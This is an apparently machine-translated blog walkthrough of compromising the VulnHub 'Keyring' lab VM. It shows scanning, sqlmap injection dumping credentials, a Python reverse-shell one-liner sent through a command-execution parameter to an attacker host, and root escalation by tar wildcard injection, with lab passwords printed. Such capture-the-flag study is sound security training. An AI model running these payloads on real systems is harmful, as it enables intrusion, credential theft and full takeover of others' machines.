当前位置:网站首页>Penetration practice vulnhub range Keyring
Penetration practice vulnhub range Keyring
2022-07-01 17:39:00 【It's safe to go to school on Fubo road】
No.26 Keyring
Target information
Download address :
https://www.vulnhub.com/entry/ia-keyring-101,718/
shooting range : VulnHub.com
Target name : IA: Keyring (1.0.1)
difficulty : Simple - secondary
Release time : 2021 year 7 month 30 Japan
The goal is : 2 individual flag
Experimental environment
attack :VMware kali 192.168.7.3
Drone aircraft :Vbox linux IP Automatic access to
information gathering
Scan host
Scan the target in the LAN IP Address
sudo nmap -sP 192.168.7.1/24
The scanned host address is 192.168.7.157
Scan port
Scan the open service port of the target
sudo nmap -sC -sV -p- 192.168.7.158 -oN keyring.nmap
Scan to 2 Open ports 22(SSH) and 80(HTTP)
Web penetration
visit 80 port
http://192.168.7.158
Open the homepage to register your account , Register an account to log in ( When registering and logging in, don't fill in the user name and password , Direct point Login The button will jump to the login page and enter the account password to login )
Login successful , stay control.php See the prompt on the page ,HPP Parameter pollution
HTTP Parameter Pollution(HPP Parameter pollution )
Brief introduction :
HTTP Parameter Pollution namely HTTP Parameter pollution , abbreviation HPP. yes web Container handling HTTP A way of parameters .
HTTP Parameter pollution (HPP) It's a kind of Web Attack avoidance technology , Allows an attacker to change HTTP Request to manipulate or search for hidden information . This circumvention technique is based on splitting attack vectors between multiple instances of parameters with the same name . Some environments handle such requests by taking values from all instances of the parameter name connected in the request .
HTTP Parameter Pollution namely HTTP Parameter pollution , abbreviation HPP. yes web Container handling HTTP A way of parameters .
HTTP Parameter pollution (HPP) It's a kind of Web Attack avoidance technology , Allows an attacker to change HTTP Request to manipulate or search for hidden information . This circumvention technique is based on splitting attack vectors between multiple instances of parameters with the same name . Some environments handle such requests by taking values from all instances of the parameter name connected in the request .
Example :
HttpPar.php The source code is as follows :
<?php
$str=$_REQUEST['str'];
echo $str;
?>
This code , receive HTTP Parameters in str Value , And show it on the page . We visit http://www.xxx.com/HttpPar.php?str=hello, The display result will be hello.
stay HTTP In request , Use & Different parameters can be connected , Such as :str=hello&id=1. But at this time, if the parameter is repeated :str=hello&str=world&str=xxser, So at this time php Only the last parameter is output when taking value , The output is xxser. This is it. HTTP Parameter pollution .
HPP Parameter pollution can SQL Injection and XSS utilize , More are used around waf
HPP Parameter pollution is simply understood , That is, we don't know what the parameter is , First do a directory scan to find other tips
Directory scanning
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.7.158 -x php,html,txt
Scan to a history.php file , Visit
http://192.168.7.158/history.php
After opening, there is a blank page , It is estimated that you need to add parameters here to access , When the logged out user visits this page again, a prompt appears
Prompt user not found , For re login user Try making parameters
http://192.168.7.158/history.php?user=user1234
When I use my registered user name to test some content , Change to admin try
http://192.168.7.158/history.php?user=admin
Get a link https://github.com/cyberbot75/keyring
Access is the repository for storing website source code , stay control.php Found in the file system Functions can be used directly , Test it
http://192.168.7.158/control.php?cmdcntr=id
SQL Injection attack
No success , Looking at the source code, I didn't find any problems , See again HPP Prompt of parameter pollution , And I got it user Parameters , Go and make a sql Injection try
Query database name
sqlmap -u http://192.168.7.158/history.php?user=user1234 --cookie='PHPSESSID=0ce7psagp018qtd5gndrsdsl8o' --batch --dbs
The query table name
sqlmap -u http://192.168.7.158/history.php?user=user1234 --cookie='PHPSESSID=0ce7psagp018qtd5gndrsdsl8o' --batch -D users --tables
Query table content
sqlmap -u http://192.168.7.158/history.php?user=user1234 --cookie='PHPSESSID=0ce7psagp018qtd5gndrsdsl8o' --batch -D users -T details --dump
Query the administrator account admin And password myadmin#p4szw0r4d, Use admin Log in to the platform with your account and use control.php I got the papers cmdcntr jurisdiction
http://192.168.7.158/control.php?cmdcntr=id
Command executed successfully , We rebound shell To kali On the attack plane
kali Attacker listening port
nc -lvvp 4444
perform payload
http://192.168.7.158/control.php?cmdcntr=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.7.3",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Successful rebound shell, Let's look for the document , Switch to bash
python3 -c 'import pty;pty.spawn("/bin/bash")'
Raise the right
cat /etc/passwd
Here is a john user , Before sql There is also one in the injection john The user tries whether the password is the same , Switch to john The user password is Sup3r S 3 c r 3 t S3cr3t S3cr3tPasSW0RD
su john
Sup3r$S3cr3t$PasSW0RD
id
Switch john User success , there lxd Right can be raised , First enter the user directory and have a look
cd /home/john
ls -al
find user.txt
cat user.txt
One more compress Program , Let's see what the file is
file compress
suid, Download him and see the content , Target on http service
python3 -m http.server
kali Attacker download compress file , View file contents
wget http://192.168.7.158:8000/compress
strings compress
compress Will execute tar Program ,tar Wildcard injection can be used to raise rights ,
payload
echo "/bin/bash" > exp.sh
echo "" > "--checkpoint-action=exec=sh exp.sh"
echo "" > --checkpoint=1
./compress
id
Successfully get root jurisdiction , see root.txt
cd /root
ls
cat root.txt
Get root.txt, Game over . Friends who like shooting can search on wechat “ It's safe to go to school on vobo road ” official account 、 Or scan the QR code below to get more targeting articles .
边栏推荐
- Research Report on development prediction and investment direction of nylon filament sewing thread in China (2022 Edition)
- 中国PBAT树脂市场预测及战略研究报告(2022版)
- 【C补充】【字符串】按日期排序显示一个月的日程
- Redis -- data type and operation
- 多线程使用不当导致的 OOM
- vulnhub靶场-hacksudo - Thor
- People help ant help task platform repair source code
- Key points on February 15, 2022
- 官宣!香港科技大学(广州)获批!
- ACM mm 2022 video understanding challenge video classification track champion autox team technology sharing
猜你喜欢
Euler function: find the number of numbers less than or equal to N and coprime with n
Htt [ripro network disk link detection plug-in] currently supports four common network disks
(1) CNN network structure
Kernel stray cat stray dog pet adoption platform H5 source code
多线程使用不当导致的 OOM
DNS
LeetCode中等题之TinyURL 的加密与解密
Vulnhub range hacker_ Kid-v1.0.1
Oom caused by improper use of multithreading
New 95 community system whole station source code
随机推荐
Redis -- data type and operation
PIP version problems: PIP problems still occur when installing akshare and using Tsinghua source and Douban source
《中国智慧环保产业发展监测与投资前景研究报告(2022版)》
Pyqt5, draw a histogram on the control
中国酶制剂市场预测与投资战略研究报告(2022版)
China PBAT resin Market Forecast and Strategic Research Report (2022 Edition)
[Verilog quick start of Niuke network question brushing series] ~ priority encoder circuit ①
6月刊 | AntDB数据库参与编写《数据库发展研究报告》 亮相信创产业榜单
股票万1免5证券开户是合理安全的吗,怎么讲
Vulnhub range hacksudo Thor
How to use JMeter function and mockjs function in metersphere interface test
线上开通ETF基金账户安全吗?有哪些步骤?
Is the software of futures pioneer formal and safe? Which futures company is safer to choose?
Roewe rx5's "a little more" product strategy
越来越多地使用 SLO 来实现可观测性|DevOps
The difference and relationship between iteratible objects, iterators and generators
存在安全隐患 起亚召回部分K3新能源
字节跳动数据平台技术揭秘:基于 ClickHouse 的复杂查询实现与优化
Official announcement! Hong Kong University of science and Technology (Guangzhou) approved!
Object. fromEntries()